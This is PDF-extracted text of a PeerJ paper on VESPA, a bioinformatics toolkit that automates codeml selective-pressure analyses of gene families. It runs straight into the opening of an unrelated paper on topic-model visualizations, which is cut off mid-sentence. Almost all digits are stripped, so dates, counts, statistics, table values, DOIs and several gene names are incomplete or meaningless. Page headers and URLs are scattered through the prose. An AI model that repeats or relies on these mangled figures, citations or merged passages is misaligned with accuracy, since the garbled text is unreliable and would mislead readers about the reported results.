understanding the results. vespa may be found at the following website: http://www.mol-evol.org/vespa. subjects bioinformatics, computational biology keywords selective pressure analysis, protein molecular evolution, large-scale comparative genomics, gene family evolution, positive selection introduction estimating selective pressure variation across homologous protein-coding genes from different species is typically done by assessing the ratio of dn/ds, i.e., the number of non-synonymous substitutions per non-synonymous site (dn) as a function of the number of synonymous substitutions per synonymous site (ds). the ratio of dn/ds is commonly referred to as omega (ω), and is routinely used to assess selective pressure variation or constraints across protein families or protein-interaction networks (kim, korbel & gerstein, ; kosiol et al., ; alvarez-ponce, aguade & rozas, ). these calculations of selective pressure variation are performed on alignments of protein coding sequences (and not on other data types such as raw reads from ngs experiments). codeml how to cite this article webb et al. ( ), vespa: very large-scale evolutionary and selective pressure analyses. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:m.oconnell@leeds.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://www.mol-evol.org/vespa http://dx.doi.org/ . /peerj-cs. is part of the paml package for the analyses of selective pressure variation in nucleotide sequence data in a maximum likelihood framework (yang, ). the models available in paml for assessing selective pressure variation can simultaneously compare variation across sites and across lineages in the homologous protein coding gene dataset. in this way the ‘‘foreground lineage’’ is compared to all other lineages in the dataset in an attempt to determine lineage specific selective pressure variation. some well-known examples of selective pressure variation on foreground lineages include the identification of positive selection in reproductive proteins that contribute to species divergence in mammals (swanson et al., ), and the identification of molecular signatures of positive selection that govern protein functional divergence in a group of mammal enzymes (loughran et al., ). a number of software packages estimate selective pressure variation (pond, frost & muse, ; yang, ; delport et al., ). one of the most popular methods is codeml from the paml software package (yang, ). the strength of this approach is the application of flexible codon-based models capable of assessing variation in selective pressures at two levels: (i) across sites in an alignment and (ii) across sites in a predefined, or ‘‘foreground’’ lineage on a phylogenetic tree (yang & dos reis, ). operating codeml requires a complex file structure to compute the parameters under multiple nested models. associated likelihood ratio tests (lrts) must also be performed in the identification of the model of best fit. these complexities are often compounded by the size of study, which increasingly are genomic in scale (liu et al., ; keane et al., ; webb et al., ). other approaches to streamline the process of applying codon-based models of evolution to homologous sequences sets focus on site-specific models such as potion (hongo et al., ). to address these issues we have designed vespa (very large-scale evolutionary and selective pressure analyses). vespa automates selective pressure analyses and associated prerequisite analyses and post-analysis summary statistics. vespa can perform both lineage-site specific and site-specific analyses whereas potion presently performs the site-specific analyses. therefore, vespa is unique in its capacity to perform the complex set of tasks involved in assessing lineage specific selective pressure variation across homologous gene families and across lineages. vespa minimizes the majority of data manipulation requirements for standard molecular evolutionary analyses and also automatically implements and analyzes selective pressure variation analyses using codeml (yang, ). in addition, vespa supplies an assessment of potential false positives and produces summary files of the results that are easy to interpret. vespa allows the user to take advantage of the wealth of publically available genomic data from model and non-model organisms to perform large-scale analyses of homology searching, alignment, phylogeny reconstruction and selective pressure variation. all that vespa requires is the protein coding dna sequences, which it will translate with the standard genetic code and use to search and construct gene family alignments. this flexible toolkit can permit large-scale analyses to be performed in an efficient manner and with fewer errors. webb et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table overview of the phases in the vespa software package. phase purpose supported input type supported file formats data preparation protein coding dna sequencesa fasta homology searching blast/hmmer output files blast tabular, hmmer standard alignment assessment and phylogeny reconstruction multiple sequence alignmentsa fasta, nexus, phylip selective pressure analysis preparation gene phylogenies (or species phylogenies) with corresponding multiple sequence alignmentsa trees: newick, nexus; alignments: see above selective pressure analysis assessment standard codeml output files generated directly by the software vespa formatted codeml output notes. aindicates phases of vespa that incorporate third-party programs. the file formats required as input for each phase of vespa are detailed. the numbering scheme is consistent with the num- bering scheme for the phases as displayed in figs. and . methods vespa helps automation by preparing input data files and processing results but program executions are initiated by the user (e.g., via submission to an hpc queuing system. vespa has five major phases (table and fig. ), each of which is composed of a number of functions. vespa was developed as a toolkit of various independent functions within each phase and the primary goal is to simplify the procedures involved in large-scale selective pressure variation analyses. each function either completes a specific phase of the analysis (e.g., homologous gene identification) or facilitates/automates the use of third-party software packages to complete more specialized procedures. the majority of functions are written in python . and are designed to operate on a unix command-line. functions are categorized as either basic or advanced, e.g., the function to identify single gene orthologs is a basic function whereas confirming both sgos and multi-gene families (mgfs) is an advanced function (fig. ). this structure also provides users with a flexible and adaptable framework for more specialist tasks. for in-depth description and format requirements, please see the program manual, tutorials and documentation published on the program website (http://www.mol-evol.org/vespa). depending on the phase of vespa, input is accepted from any program capable of producing the supported file format(s) or a selected collection of third-party programs (table ). for example, phase (the homology searching phase) currently parses the output of blast (altschul et al., ) or hmmer (eddy, ), whereas the alignment assessment and phylogeny reconstruction phase is limited only by file format requirements (e.g., fasta, nexus, phylip). functions in vespa are invoked following the program call (i.e., vespa.py) along with arguments to indicate the phase-relevant input data and function-specific optional arguments. depending on the function, optional arguments enable users to modify parameter values (e.g., blast search thresholds, phylogenetic reconstruction settings) or alter command-specific settings. webb et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.mol-evol.org/vespa http://dx.doi.org/ . /peerj-cs. figure overview of the phases implemented in vespa. the five phases of vespa are listed from ‘‘data preparation’’ to ‘‘selective pressure analysis assessment’’. underneath each is a grey box enclosing some representative commands from that phase. each phase concludes with a black box indicating the use of a third-party program to perform the necessary task (e.g., sequence alignment or phylogenetic recon- struction). the output of the first four phases is then used as the input of the next phase. the final phase is written in perl and concludes with the creation of summary files that contain all the relevant information from the selective pressure analyses. webb et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure overview of the options available in the vespa package. an overview of the basic and ad- vanced analysis options at each of the five phases of vespa. the functions of each phase are shown as white boxes, and are invoked in the order shown (note: that not all functions are shown here; a complete set of vespa functions are available in the manual). within each phase the available alternatives for pro- cessing the data are given on the left and right hand columns. these only vary for phase and . the left most column may represent the processing of single gene orthologs that you wish to impose the species tree onto. if this is the case then vespa will allow you to generate the phylogenies from the species tree (as shown on the left most side of (c)). (continued on next page...) webb et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure (...continued) however, you may wish to generate gene trees directly from the data for either multigene families or for single gene families of uncertain orthology (this option is shown on the right most column in (c) and in- volves selecting the substitution model of best fit and reconstructing the phylogeny). in addition to the functions, the input and output of each phase are shown in dark grey boxes and if a third-party program is required to analyze the output of the phase, the program is specified below the phase in a light grey box. for three of the five phases (data preparation, homology searching, and selective pressure analysis assess- ment) the functions invoked in both the basic and advanced options are identical. the primary difference between the analyses (basic/advanced) is found in the alignment assessment and phylogeny reconstruction phase. the advanced option uses prottest (darriba et al., ) for substitution model selection and mr- bayes (ronquist & huelsenbeck, ) for phylogenetic reconstruction. beyond this major difference, the selective pressure analysis preparation simply requires a function to import the output of mrbayes. functions in vespa complete by producing the relevant output files without modifying the original input files. while this design results in the generation of a number of intermediate files (especially in the later stages of selection analysis), it enables users to easily keep track of all data modifications. each phase of vespa’s analysis produces the necessary data files for conducting a specialized analysis using third-party software (fig. ). homology searches in particular are not fully automated by vespa for two reasons: (i) they are best run as individual serial tasks on large high-end computing clusters, or (ii) the submission processes differ across compute clusters. however, vespa can generate the blast formatted database for subsequent homology searches. all vespa commands are issued on the command line and are readily executable via a cluster scheduling system. results as detailed above, vespa incorporates two analyses, a basic analysis for analyzing sgos and an advanced analysis for analyzing both sgos and mgfs (fig. ). here we provide an example of an application of the basic analysis using ten genes from eleven species as a small test dataset. as seen in fig. , the process begins with the user supplying transcript data for the data preparation phase. the first phase begins with the clean function, a basic quality control (qc) filtering step, followed by translate, to translate the filtered transcripts. vespa then proceeds to the make_database function to create a sequence database for homology searching with either blast (altschul et al., ) or hmmer (eddy, ). upon completion of homology searching, the function reciprocal_groups is used to identify proteins that share reciprocal similarity. then, files containing these families of sequences are produced. this function is highly configurable by optional arguments so that users can evaluate various different similarity scenarios (i.e., different e-value cutoffs) with only a single output file. the produced sequences files are then aligned using any multiple sequence alignment (msa) method that can produce a supported file format (e.g., programs such as muscle (edgar, ) and prank (loytynoja & goldman, ) are supported). it is advisable to explore a variety of msa methods for every gene family (muller et al., ), and vespa facilitates this the user to compare these different approaches. the metal_compare function (within the alignment assessment and phylogeny reconstruction phase) in vespa allows alignment approaches to be compared and a single msa of webb et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. best fit is retained for each gene family (i.e., gene family a may have an msa from muscle while gene family b may have an msa from prank). msas for each sgo family can then used in combination with the user-defined species phylogeny to create gene phylogenies using the function infer_genetrees or gene trees can be generated directly from the msas the msas and gene phylogenies are then used for the selective pressure analysis preparation phase. the function create_branch can be used to specifically label internal nodes as ancestral lineages that the user may wish to explore. the msas and gene phylogenies are then used by the function setup_codeml to automatically create the complex codeml file structure and a task file for automating codeml (yang, ). upon completion of codeml the codeml_reader function is used to automate the interpretation of the results and producing summary files of the results. vespa creates a number of output files for each homologous gene family detailing the results of the codeml analysis. there are two primary types of output files for each gene family tested: ( ) a single csv formatted summary text file (shown in table ) for one gene family, and ( ), a multiple sequence alignment for each model tested detailing the sites (protein/codon) proposed to be under positive selection (this is also provided in html format so it can be viewed with colour coding for ease of interpretation). to compare the results of vespa to other pipelines and predictions of positive selection, we used a dataset of gene families from the selectome database (moretti et al., ). a tarball of the data and results of the vespa analysis of gene families (i.e., input sequences, alignments, trees, codeml output, vespa summary at each phase) have been provided in file s . selectome is a publicly available database of genes under positive selection. it was chosen to provide this benchmark dataset as it permits direct access to all relevant files used in its calculations, and it also uses the codon based models of evolution implemented in codeml and integrated in vespa facilitating a direct comparison of results. we carried out two tests with the dataset from selectome (release ) (moretti et al., ). firstly we wished to assess if the way in which vespa automatically sets up all codon models, labeling of foreground lineages and lrts produced comparable results with those from the selectome pipeline. to this end, we ran vespa using the masked dna alignments and gene trees for each of the homologous gene families from the selectome database. vespa produced identical results for these input alignments. this demonstrates that vespa’s automation of the process is reliable and robust. one challenge in performing these analyses is that different alignment methods applied to the same gene families can produce different results. vespa provides the ‘‘metal_compare’’ function, which allows alignments for a gene family to be compared. to highlight its utility, we performed an additional test on this dataset of homologous gene families from selectome. we used the unmasked sequences and generated a set of alternative alignments through muscle (edgar, ) and prank (loytynoja & goldman, ) and using the metal_compare function of vespa we identified the best (i.e., most statistically significant) alignment for each gene family. the vespa functions ‘setup_codeml’ and ‘codeml_reader’ were then used to automate the codeml set up and analysis. the vespa pipeline was able to replicate the lineages identified as under positive selection in the selectome database. webb et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. table sample of a summary output file created by ‘codeml_reader’ in phase of the vespa package. model tree model type p w (t = ) lnl lrt result parameter estimates positive selection positively selected sites in × alignment (p(w > ) > . ) m sample_msa homogeneous − . n/a w = . no m neutral sample_msa site-specific − . n/a p = . p = . w = . w = . not allowed m selection sample_msa site-specific − . m neutral p = . p = . p = . w = . w = . w = . no m discrtk sample_msa site-specific − . m discrtk p = . p = . w = . w = . yes alignment ( neb sites): m discrtk sample_msa site-specific − . m discrtk p = . p = . p = . w = . w = . w = . no m sample_msa site-specific − . n/a p= . q= . not allowed m sample_msa site-specific − . m , m p= . p = . p = . q= . w = . no m a sample_msa site-specific − . n/a p= . p = . p = . q= . w = . not allowed (continued on next page) w ebb etal. ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) model tree model type p w (t = ) lnl lrt result parameter estimates positive selection positively selected sites in × alignment (p(w > ) > . ) modela sample_msa_primates lineage-site − . m neutral, modelanll p = . p = . p = . p = . w = . w = . w = . no modelanull sample_msa_primates lineage-site − . n/a p = . p = . p = . p = . w = . w = . w = . modela sample_msa_chimp lineage-site − . modela p = . p = . p = . p = . w = . w = . w = . yes alignment ( beb sites): modelanull sample_msa_chimp lineage-site − . n/a p = . p = . p = . p = . w = . w = . w = . not allowed modela sample_msa_human lineage-site − . m neutral, modelanull p = . p = . p = . p = . w = . w = . w = . no (continued on next page) w ebb etal. ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) model tree model type p w (t = ) lnl lrt result parameter estimates positive selection positively selected sites in × alignment (p(w > ) > . ) modelanull sample_msa_human lineage-site − . n/a p = . p = . p = . p = . w = . w = . w = . no notes. the following information is provided for each model tested: the lineage (internal or terminal branches) tested as foreground; the type of model (i.e. site-specific or branch-specific) being tested; number of free parameters in the ÏĽ distribution that are estimate by codeml, the initial ÏĽ value used by codeml (each run within vespa has multiple starting values to minimise the risk of reporting from a lo- cal minimum on the likelihood plane); the resulting log likelihood (lnl) of the analysis; the resulting model of the likelihood ratio test (lrt); the parameter estimates of codeml; if positive selection was detected (yes/no); and the alignment coordinates for any positively selected sites. neb, naÃŕve empirical bayes estimate and beb, bayes empirical bayes estimate. w ebb etal. ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table comparison of the results from gene families from the selectome database analysed in vespa. original masked alignment alternative alignment positive selection (modela) positively selected sites postive selection (modela) positively selected sites atg l yes (hpgponm) matched yes (hpgponm , hp*, and hpg*) matched atp sl yes (hp) matched yes (hp) matched azgp yes (hpgponm) matched yes (hpgponm) matched / ( ) c orf yes (hpg) matched yes (hpg) matched cacna i yes (hp) matched yes (hp) matched / ( , ) casp yes (hpg) matched yes (hpg) matched cd yes (hpg) matched yes (hpg) matched cobll yes (hpgpon) matched yes (hpgpon) matched hus yes (hpgponm) matched yes (hpgponm) matched idh b yes (hp) matched yes (hp) matched ifit yes (hpgponm) matched yes (hpgponm) matched ints yes (hpgponm) matched yes (hpgponm) matched odc yes (hpgpon) matched yes (hpgpon) matched pask yes (hp) matched yes (hp) matched / ( ) rrp yes (hpgpon) matched yes (hpgpon) matched rtp yes (hp) matched yes (hp) matched slc a yes (pg) matched yes (pg) matched trim yes (hpgpo) matched yes (hpgpo) matched / ( , ) notes. *false positives. the homologous families chosen from the selectome database are given their hugo identifier on the left. the results of analysis in vespa as compared to selectome re- sults using the same masked alignments are shown in columns and . the results from vespa using the alternative alignment method as compared to the original alignments is shown in columns and . for both alignments (original and alternative) it is indicated if modela positive selection is identified in the same lineages, and if the sites identi- fied as positively selected match. using the alternative alignments, four cases where the sites identified as positively selected did not completely match the position in the original alignment are indicated in parenthesis. the extant lineages with evidence of positive selection throughout are shown in parentheses and are abbreviated as follows: human (h), chimp (p), gorilla (g), orangutan (po), gibbon (n) and macaque (m). ancestral nodes are denoted as a combination of the abbreviations for the extant lineages that the node includes, e.g. the ancestral node joining human (h) and chimp (p) is denoted as hp. however, the results presented in table include small differences in the number and position of sites identified as positively selected. the atp sl alternative alignment was found to have evidence of positive selection on two additional branches as compared to the original result, however, closer inspection of the alternative alignments found the additional branches to be false positives due to a poorly aligned segment of the msa. other slight variations in results between the original and alternative alignments included three instances where gene families (c orf , cacna i, and pask) had a difference of one positively selected site and one instance (trim ) of differences in two positively selected sites reported in the original alignment that was not reported in the alternative alignment for the same family. finally, a single gene (slc a ) contained additional sites under positive selection following vespa analysis using the alternative alignments, it should be noted that these sites are within a poorly conserved span of the protein. the remaining genes were found to replicate the positively selected sites reported in selectome. to demonstrate the application of vespa to very large datasets we have assembled a novel dataset of , homologous gene families (each containing ≥ sequences) from the ensembl genome database (release ) (yates et al., ). using the vespa webb et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ‘‘clean_ensembl’’ command we: ( ) restricted the protein coding sequences per genome to the longest transcript for each gene, and ( ) logged and discarded sequences containing internal stop codons or incomplete codons. multiple sequence alignments were made for all gene families identified and phylogenies for each homologous gene families were inferred by vespa from the topology of the ensembl compara species tree demonstrating the flexibility of the vespa package (phase ). finally, the selective pressure analyses were carried out in vespa phase with human and then mouse labeled as the foreground lineages of interest. of the , genes analyzed by vespa showed evidence of site-specific positive selection (model ‘‘m ’’), genes showed evidence of mouse-specific positive selection (‘‘model a’’), and finally showed evidence of human-specific positive selection (‘‘model a’’); file s contains the full set of results. for the dataset of , homologous gene families the majority of vespa functions completed in under four minutes (on the following system: intel xeon cpu e ( . ghz), gb ram, using ubuntu os . ). the exceptions were the ’codeml_setup’ function which took approximately min for this dataset, this function is slightly slower as it is creating the complex directory/file structure for codeml. the second exception was the ’codeml reader’ function which took approximately h (this function is to analyze the large number of files created by codeml and produce the output and summary files). the codeml component of the analyses took , cpu hours in total to complete. (note: these time estimates are not inclusive of phase —homology search). discussion one of the primary goals of vespa is to simplify and streamline basic comparative genomic procedures such as filtering poor quality protein coding sequences and generating the most appropriate alignment for each gene family. vespa also simplifies and streamlines codeml-based selective pressure analyses. from our analysis of , homologous gene families we found that the majority of tasks could be completed within minutes using vespa. however, the codeml-related functions for creating the input file structure and examining the output files takes considerably longer to complete. as these functions are an essential aspect of the pipeline, decreasing their execution time will be a primary goal in future updates to vespa. two possible approaches that will be explored are: (i) increasing the overall efficiency of the functions and (ii) developing a version of vespa capable running these scripts (and possibly others) in parallel on multi-core processors. the modular nature of vespa enables the pipeline (or specific functions) to be used in conjunction with existing workflow systems. the only requirements would be having the necessary data (msas, protein-coding transcripts, etc.) in a supported format. for example, vespa could be used to perform a selective pressure analysis on protein-coding transcripts obtained from rna-seq. also, it is possible to skip specific stages of the vespa pipeline for a preferred approach/software package, e.g., it is possible to use an alternative approach for phylogenetic reconstruction and employ the resulting tree in a vespa analysis. it should also be possible to integrate the majority of vespa’s functions (with the exception of the built-in tree pruning function) into workflow systems such as galaxy (afgan et webb et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. al., ). this would allow vespa to operate in conjunction with the scripts and tools already available on galaxy, enabling greater freedom for the user. this integration will be implemented in future releases of vespa. we also employed vespa in the analysis of gene families from the selectome database (moretti et al., ). our initial comparison used both the alignment (masked) and tree provided by selectome. vespa was able to confirm the findings reported within the database. secondly, we re-aligned the gene families using two methods (muscle and prank) and then again performed the selective pressure analysis using vespa. the analysis of these alternative alignments revealed minor differences in the reported positively selected sites of five genes (c orf , cacna i, pask, slc a , and trim ). these differences illustrate that the input alignment may have an impact on the genes and sites identified as positively selected as in blackburne & whelan, ( ). to avoid biased results due to choice of alignment method and we highly recommend the use of the ‘‘metal_compare’’ function or programs such as aqua (muller et al., ) to select the best alignment for each gene family. conclusion vespa provides a flexible software package designed to simplify large-scale comparative genomic analyses and specifically selective pressure variation analysis implemented in codeml (yang, ). vespa automates the entire comparative genomic process from data quality checks and homology searching to phylogeny reconstruction and selective pressure analyses, and it produces simple summary files for the user. vespa offers users various functions that automate many of the required prerequisite analyses and removes error-prone data manipulation steps. lastly, it is important to note that the processes implemented in the phases of vespa facilitates those working on de novo sequence data or non-model organisms to perform large-scale comparative genomic analyses without having pre-processed gene families. all that is required by vespa is that the protein coding dna sequences are available. acknowledgements we would also like to thank louisse mirabueno (funded by the wellcome trust vacation scholarship programme) and other members of the community for their help in trouble- shooting, testing and providing feedback on the vespa software package and associated manual and tutorials. additional information and declarations funding this work was undertaken on marc , part of the high performance computing facilities at the university of leeds. the research was supported by science foundation ireland research frontiers programme grant (sfi rfp eob ) to mjo’c, and dcu pierse trust award and sobt awards (to taw and mjo’c) and the university of leeds webb et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. great minds academic fellowship to mjo’c. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: science foundation ireland research frontiers programme: sfi rfp eob . competing interests the authors have no competing interests. author contributions • andrew e. webb performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • thomas a. walsh performed the experiments, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. • mary j. o’connell conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: github: https://github.com/aewebb /vespa. supplementary file (github): https://github.com/aewebb /vespa/blob/master/supplementaryfile .tar.bz . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references afgan e, baker d, van den beek m, blankenberg d, bouvier d, Čech m, chilton j, clements d, coraor n, eberhard c, grüning b, guerler a, hillman-jackson j, von kuster g, rasche e, soranzo n, turaga n, taylor j, nekrutenko a, goecks j. . the galaxy platform for accessible, reproducible and collaborative biomedical analy- ses: update. nucleic acids research (w ):w –w doi . /nar/gkw . altschul sf, madden tl, schaffer aa, zhang j, zhang z, miller w, lipman dj. . gapped blast and psi-blast: a new generation of protein database search programs. nucleic acids research ( ): – doi . /nar/ . . . alvarez-ponce d, aguade m, rozas j. . network-level molecular evolutionary analysis of the insulin/tor signal transduction pathway across drosophila genomes. genome research ( ): – doi . /gr. . . webb et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/aewebb /vespa https://github.com/aewebb /vespa/blob/master/supplementaryfile .tar.bz http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /nar/gkw http://dx.doi.org/ . /nar/ . . http://dx.doi.org/ . /gr. . http://dx.doi.org/ . /peerj-cs. blackburne bp, whelan s. . class of multiple sequence alignment algorithm affects genomic analysis. molecular biology and evolution ( ): – doi . /molbev/mss . darriba d, taboada gl, doallo r, posada d. . prottest : fast selection of best-fit models of protein evolution. bioinformatics ( ): – doi . /bioinformatics/btr . delport w, poon af, frost sd, kosakovsky pond sl. . datamonkey : a suite of phylogenetic analysis tools for evolutionary biology. bioinformatics ( ): – doi . /bioinformatics/btq . eddy sr. . profile hidden markov models. bioinformatics ( ): – doi . /bioinformatics/ . . . edgar rc. . muscle: a multiple sequence alignment method with reduced time and space complexity. bmc bioinformatics : doi . / - - - . hongo ja, de castro gm, cintra lc, zerlotini a, lobo fp. . potion: an end- to-end pipeline for positive darwinian selection detection in genome-scale data through phylogenetic comparison of protein-coding genes. bmc genomics : doi . /s - - - . keane m, semeiks j, webb ae, li yi, quesada v, craig t, madsen lb, van dam s, brawand d, marques pi, michalak p, kang l, bhak j, yim hs, grishin nv, nielsen nh, heide-jorgensen mp, oziolor em, matson cw, church gm, stuart gw, patton jc, george jc, suydam r, larsen k, lopez-otin c, o’connell mj, bickham jw, thomsen b, de magalhaes jp. . insights into the evolu- tion of longevity from the bowhead whale genome. cell reports ( ): – doi . /j.celrep. . . . kim pm, korbel jo, gerstein mb. . positive selection at the protein network periphery: evaluation in terms of structural constraints and cellular context. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . kosiol c, vinar t, da fonseca rr, hubisz mj, bustamante cd, nielsen r, siepel a. . patterns of positive selection in six mammalian genomes. plos genetics ( ):e doi . /journal.pgen. . liu s, lorenzen ed, fumagalli m, li b, harris k, xiong z, zhou l, korneliussen ts, somel m, babbitt c, wray g, li j, he w, wang z, fu w, xiang x, morgan cc, doherty a, o’connell mj, mcinerney jo, born ew, dalen l, dietz r, orlando l, sonne c, zhang g, nielsen r, willerslev e, wang j. . population genomics reveal recent speciation and rapid evolutionary adaptation in polar bears. cell ( ): – doi . /j.cell. . . . loughran nb, hinde s, mccormick-hill s, leidal kg, bloomberg s, loughran st, o’connor b, o’fagain c, nauseef wa, o’connell mj. . functional consequence of positive selection revealed through rational mutagenesis of human myeloperoxidase. molecular biology and evolution ( ): – doi . /molbev/mss . webb et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /molbev/mss http://dx.doi.org/ . /bioinformatics/btr http://dx.doi.org/ . /bioinformatics/btq http://dx.doi.org/ . /bioinformatics/ . . http://dx.doi.org/ . / - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.celrep. . . http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /journal.pgen. http://dx.doi.org/ . /j.cell. . . http://dx.doi.org/ . /molbev/mss http://dx.doi.org/ . /peerj-cs. loytynoja a, goldman n. . an algorithm for progressive multiple alignment of sequences with insertions. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . moretti s, laurenczy b, gharib wh, castella b, kuzniar a, schabauer h, studer ra, valle m, salamin n, stockinger h, robinson-rechavi m. . selectome update: quality control and computational improvements to a database of positive selection. nucleic acids research (database issue):d –d doi . /nar/gkt . muller j, creevey cj, thompson jd, arendt d, bork p. . aqua: automated quality improvement for multiple sequence alignments. bioinformatics ( ): – doi . /bioinformatics/btp . pond sl, frost sd, muse sv. . hyphy: hypothesis testing using phylogenies. bioinformatics ( ): – doi . /bioinformatics/bti . ronquist f, huelsenbeck jp. . mrbayes : bayesian phylogenetic inference under mixed models. bioinformatics ( ): – . doi . /bioinformatics/btg . swanson wj, yang z, wolfner mf, aquadro cf. . positive darwinian selection drives the evolution of several female reproductive proteins in mammals. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . webb ae, gerek zn, morgan cc, walsh ta, loscher ce, edwards sv, o’connell mj. . adaptive evolution as a predictor of species-specific innate immune response. molecular biology and evolution ( ): – doi . /molbev/msv . yang z. . paml : phylogenetic analysis by maximum likelihood. molecular biology and evolution ( ): – doi . /molbev/msm . yang z, dos reis m. . statistical properties of the branch-site test of positive selec- tion. molecular biology and evolution ( ): – doi . /molbev/msq . yates a, akanni w, amode mr, barrell d, billis k, carvalho-silva d, cummins c, clapham p, fitzgerald s, gil l, giron cg, gordon l, hourlier t, hunt se, janacek sh, johnson n, juettemann t, keenan s, lavidas i, martin fj, maurel t, mclaren w, murphy dn, nag r, nuhn m, parker a, patricio m, pignatelli m, rahtz m, riat hs, sheppard d, taylor k, thormann a, vullo a, wilder sp, zadissa a, birney e, harrow j, muffato m, perry e, ruffier m, spudich g, trevanion sj, cunningham f, aken bl, zerbino dr, flicek p. . ensembl . nucleic acids research (d ):d –d doi . /nar/gkv . webb et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /nar/gkt http://dx.doi.org/ . /bioinformatics/btp http://dx.doi.org/ . /bioinformatics/bti http://dx.doi.org/ . /bioinformatics/btg http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /molbev/msv http://dx.doi.org/ . /molbev/msm http://dx.doi.org/ . /molbev/msq http://dx.doi.org/ . /nar/gkv http://dx.doi.org/ . /peerj-cs. evaluating visual representations for topic understanding and their effects on manually generated topic labels alison smith∗ tak yeon lee∗ forough poursabzi-sangdeh† jordan boyd-graber† niklas elmqvist∗ leah findlater∗ ∗university of maryland, college park, md †university of colorado, boulder, co {amsmit,tylee}@cs.umd.edu {forough.poursabzisangdeh, jordan.boyd.graber}@colorado.edu {elm,leahkf}@cs.umd.edu abstract probabilistic topic models are important tools for indexing, summarizing, and analyzing large document collections by their themes. however, promoting end-user understanding of topics remains an open research prob- lem. we compare labels generated by users given four topic visualization techniques— word lists, word lists with bars, word clouds, and network graphs—against each other and against automatically generated labels. our basis of comparison is participant ratings of how well labels describe documents from the topic. our study has two phases: a label- ing phase where participants label visualized topics and a validation phase where different participants select which labels best describe the topics’ documents. although all visual- izations produce similar quality labels, sim- ple visualizations such as word lists allow par- ticipants to quickly understand topics, while complex visualizations take longer but expose multi-word expressions that simpler visualiza- tions obscure. automatic labels lag behind user-created labels, but our dataset of man- ually labeled topics highlights linguistic pat- terns (e.g., hypernyms, phrases) that can be used to improve automatic topic labeling al- gorithms. comprehensible topic models needed a central challenge of the “big data” era is to help users make sense of large text collections (hotho et al., ). a common approach to summarizing the main themes in a corpus is to use topic models (blei, ), which are data-driven statistical models that identify words that appear together in similar docu- ments. these sets of words or “topics” evince inter- nal coherence and can help guide users to relevant documents. for instance, an fbi investigator sifting through the released hillary clinton e-mails may see a topic with the words “benghazi”, “libya”, “blu- menthal”, and “success”, spurring the investigator to dig deeper to find further evidence of inappro- priate communication with longtime friend sidney blumenthal regarding benghazi. a key challenge for topic modeling, however, is how to promote end-user understanding of individ- ual topics and the overall model. most existing topic presentations use simple word lists (chaney and blei, ; eisenstein et al., ). although a variety of alternative topic visualization techniques exist (sievert and shirley, ; yi et al., ), there has been no systematic assessment to compare them. beyond exploring different visualization tech- niques, another means of making topics easier for users to understand is to provide descriptive labels to complement a topic’s set of words (aletras et al., ). unfortunately, manual labeling is slow and, while automatic labeling approaches exist (lau et al., ; mei et al., ; lau et al., ), their effectiveness is not guaranteed for all tasks. to better understand these problems, we use la- beling to evaluate topic model visualizations. our study compares the impact of four commonly used topic visualization techniques on the labels that users create when interpreting a topic (figure ): word lists, word lists with bars, word clouds, and network graphs. on amazon mechanical turk, one set of users viewed a series of individual topic vi- transactions of the association for computational linguistics, vol. , pp. – , . action editor: timothy baldwin. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. sualizations and provided a label to describe each topic, while a second set of users assessed the qual- ity of those labels alongside automatically generated ones. better labels imply that the topic visualiza- tion provide users a more accurate interpretation (la- beling) of the topic. the four visualization techniques have inherent trade-offs. perhaps unsurprisingly, there is no mean- ingful difference in the quality of the labels pro- duced from the four visualization techniques. how- ever, simple visualizations (word list and word cloud) support a quick, first-glance understanding of topics, while more complex visualizations (net- work graph) take longer but reveal relationships be- tween words. also, user-created labels are better received than algorithmically-generated labels, but more detailed analysis uncovers features specific to high-quality labels (e.g., tendency towards abstrac- tion, inclusion of phrases) and the types 